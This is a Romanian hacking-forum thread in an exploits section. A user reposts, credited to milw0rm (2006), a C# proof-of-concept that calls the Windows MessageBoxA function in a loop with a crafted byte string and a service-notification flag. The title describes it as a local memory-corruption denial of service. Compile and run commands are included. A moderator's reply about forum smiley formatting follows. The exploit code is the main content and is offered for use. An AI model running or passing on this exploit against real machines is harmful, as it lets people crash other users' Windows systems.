Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
deyutza07 pe Simpatie.ro
Femeie
23 ani
Buzau
cauta Barbat
25 - 48 ani
Hacking and more... / Exploituri si POCs / MS Windows (MessageBox) Memory Corruption Local Denial of Service Moderat de Shocker
Autor
Mesaj Pagini: 1
Zero_Cool
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 796
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
{
   byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
   uint MB_SERVICE_NOTIFICATION = 0x00200000u;
   fixed(byte* pHelloBug = &helloBug[0])
   {
     for(int i=0; i<10; i++)
       MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
   }
}
}
// >> csc /unsafe mbox.cs
// >> mbox.exe

// milw0rm.com [2006-12-20]

ps ca sa vedeti sursa fara smile`uri, apasati pe butonu 'Citati'

Modificat de Zero_Cool (acum 17 ani)


pus acum 17 ani
   
Shocker
Super Moderator

Din: localhost
Inregistrat: acum 17 ani
Postari: 2084
A postat FishBoneZ textul in [ code ] dar am sters postul pentru ca am modificat postul initial al lui Zero_cool in asa fel incat sa nu mai afiseze smiley-uri.

Am mai zis: Daca nu vreti sa mai afiseze smiley-urile, cand postati debifati casuta Converteste smilies in imagini


_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

pus acum 17 ani
   
Pagini: 1  

Mergi la